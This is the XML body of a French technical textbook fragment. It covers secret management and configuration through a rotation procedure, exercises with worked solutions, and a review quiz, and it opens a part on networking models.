        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Consigner la rotation et sa date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six étapes traçables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Rotation d'un secret applicatif</w:t>
        <w:br/>
        <w:t># 1. Générer</w:t>
        <w:br/>
        <w:t>openssl rand -base64 48</w:t>
        <w:br/>
        <w:br/>
        <w:t># 2. Écrire dans le coffre sous une nouvelle version</w:t>
        <w:br/>
        <w:t>vault kv put secret/app session_key=@nouvelle-cle.txt</w:t>
        <w:br/>
        <w:br/>
        <w:t># 3. Redémarrer les services consommateurs, un par un</w:t>
        <w:br/>
        <w:t>kubectl rollout restart deployment/app</w:t>
        <w:br/>
        <w:br/>
        <w:t># 4. Vérifier</w:t>
        <w:br/>
        <w:t>kubectl rollout status deployment/app</w:t>
        <w:br/>
        <w:br/>
        <w:t># 5. Révoquer l'ancienne version</w:t>
        <w:br/>
        <w:t>vault kv metadata put -max-versions=2 secret/app</w:t>
        <w:br/>
        <w:br/>
        <w:t># 6. Tracer</w:t>
        <w:br/>
        <w:t>echo "$(date -I) rotation session_key terminée" &gt;&gt; journal-rotations.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.185 — Cinq secrets et leur rotation</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14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Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Fréquence</w:t>
            </w:r>
          </w:p>
        </w:tc>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Durée de validité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clé d'API interne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Annuelle</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12 mois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Mot de passe de base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Semestrielle</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6 mois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jeton de déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trimestrielle</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3 mois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Certificat TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Automatique</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90 jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secret compromis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Immédiate</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0</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TOUJOURS SAVOIR QUI LIT UN SECRET</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un coffre journalise les accès. Sans journal, une compromission est indétectable : on ne sait ni quand ni par qui le secret a été lu.</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VÉRIFICATIONS AVANT LA PRODUCTION</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.env</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> figure dans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.gitignore</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</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.env.example</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> documente toutes les variables.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Aucun secret dans l'historique Git (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>git log -p | grep</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Les secrets de production sont dans un coffre.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La procédure de rotation est écrite et testée.</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Code, configuration et secret sont trois natures distinctes.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configuration vient de l'environnement, pas du code.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On construit une fois, on configure à l'exécution.</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.env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est un outil local, jamais une source de vérité.</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variables d'environnement sont visibles par le processus.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SOPS chiffre les secrets qui doivent être versionnés.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rotation se prépare avec deux versions simultanées.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Sans journal d'accès, une compromission reste invisible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'application a une configuration saine. Reste à la relier au monde : le chapitre suivant ouvre la partie réseaux.</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53.1 — Extraire la configuration du code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Une application contient trois URL codées en dur.</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Identifiez les valeurs variables.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Nommez-les selon la convention.</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Validez au démarrage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 53.2 — Chiffrer un fichier de secrets</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 dépôt doit contenir la configuration d'un cluster.</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Générez une paire de clés.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Chiffrez le fichier.</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qu'il est illisible sans clé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 53.3 — Préparer une rotation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une clé d'API a été publiée par erreur dans un ticket.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Créez la nouvelle clé.</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Déployez-la progressivement.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Révoquez l'ancienne et vérifiez les journaux.</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53.1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config.js</w:t>
        <w:br/>
        <w:t>const requis = ["API_URL", "SESSION_SECRET"];</w:t>
        <w:br/>
        <w:t>const manquantes = requis.filter((cle) =&gt; !process.env[cle]);</w:t>
        <w:br/>
        <w:t>if (manquantes.length) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  throw new Error(`Variables manquantes : ${manquantes.join(", ")}`);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>export const config = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  apiUrl: process.env.API_URL,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  logLevel: process.env.LOG_LEVEL ?? "info",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  port: Number(process.env.PORT ?? 3000),</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sessionSecret: process.env.SESSION_SECRET,</w:t>
        <w:br/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'échec au démarrage vaut mieux qu'une erreur obscure à la première requête.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une valeur par défaut explicite (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) documente le comportement attendu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 53.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>age-keygen -o age.key</w:t>
        <w:br/>
        <w:t>sops --encrypt --age "$(age-keygen -y age.key)" cluster.yaml &gt; cluster.enc.yaml</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier le contenu chiffré</w:t>
        <w:br/>
        <w:t>head -5 cluster.enc.yaml</w:t>
        <w:br/>
        <w:br/>
        <w:t># Déchiffrer en développement</w:t>
        <w:br/>
        <w:t>SOPS_AGE_KEY_FILE=age.key sops --decrypt cluster.enc.yaml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La clé privée ne doit jamais être versionnée ; elle vit dans le coffre ou sur le poste de l'administrateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le contrôle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> confirme que les valeurs ne sont plus lisibles en clair.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 53.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La clé est publique dès sa publication : la révocation est obligatoire, même si aucun usage malveillant n'est détecté.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Déployer d'abord la nouvelle valeur évite une coupure pendant la rotation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les journaux d'accès au coffre et de l'API révèlent un usage indu pendant la fenêtre d'exposition.</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Où doit vivre la configuration d'une application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Dans le code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Dans l'environnement d'exécution</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Dans l'image de conteneur</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Dans le README</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 xml:space="preserve">Pourquoi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne doit-il jamais être versionné en production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Il est trop gros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Il contient des secrets et diffère par environnement</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Git le refuse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Il ralentit les tests</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 fait SOPS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Compresser des fichiers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Chiffrer des fichiers de configuration</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Gérer les branches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Surveiller les services</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Quelle est la première étape d'une rotation de secret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Révoquer l'ancien</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Créer le nouveau</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Redémarrer les serveurs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Prévenir les utilisateurs</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Pourquoi éviter un secret en argument de commande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C'est lent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 xml:space="preserve">Il est visible dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> et l'historique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Cela ne fonctionne pas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C'est trop long</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Le même artefact doit fonctionner dans tous les environnements.</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Le fichier contient des valeurs sensibles propres à un environnement.</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Il chiffre les valeurs tout en laissant la structure lisible.</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On déploie le nouveau avant de révoquer l'ancien, pour éviter une coupure.</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Les arguments de processus sont lisibles par les autres utilisateurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId84"/>
          <w:footerReference w:type="default" r:id="rId85"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE II</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Réseaux, protocoles et serveurs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Du modèle OSI aux serveurs web : DNS, HTTP, TLS, SSH, proxy, répartition de charge et messagerie.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>46. Réseaux : modèles et couches · 47. Adressage IP, sous-réseaux et routage · 48. DNS : nommer, résoudre, diagnostiquer · 49. HTTP/1.1, HTTP/2 et HTTP/3 · 50. TLS et certificats · 51. SSH : accès distant et tunnels · 52. Serveurs web : Nginx et Apache · 53. Répartition de charge, proxy et CDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>54. Réseaux : modèles et couches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Comprendre ce qui se passe entre deux machines, du câble à l'application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 53</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Situer les protocoles dans les modèles en couches.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Décrire le trajet d'un paquet entre deux machines.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Diagnostiquer une panne couche par couche.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Comprendre encapsulation et MTU.</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Utiliser les outils d'observation réseau.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>54.1 Deux modèles, une même réalité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le modèle OSI en sept couches est un outil pédagogique ; le modèle TCP/IP en quatre couches décrit ce qui est réellement implémenté. Les deux se correspondent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.186 — Sept couches et leur équivalent</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208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OSI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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TCP/IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
